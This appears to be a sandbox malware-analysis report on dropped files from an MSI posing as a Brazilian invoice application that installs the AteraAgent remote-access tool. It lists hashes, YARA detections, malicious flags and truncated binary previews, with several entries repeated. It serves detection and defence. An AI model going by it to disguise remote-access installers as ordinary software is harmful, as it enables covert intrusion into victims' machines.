                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):437346
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.648237321448186
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:Bt3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsW:fzOE2Z34KGzOE2Z34K7
                                                                                                                                                                                                                                                                                              MD5:B5869E085F47D2F8DEEEA7D5F784D257
                                                                                                                                                                                                                                                                                              SHA1:422D3D23870197172E74881CFE070B59CBB5A812
                                                                                                                                                                                                                                                                                              SHA-256:498F62488B0E45B8715E152899F5921C648EC190A1570B2978F9DB37CA2A42B0
                                                                                                                                                                                                                                                                                              SHA-512:3FB1CA8E06231BD21C3718B07FB6DD92F7E907BECD08275BB88C3350F97512070830887116EB7B1351D73CD37BF08952175C56351DD94E2B6C425A997082A1A7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI41D0.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@C7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
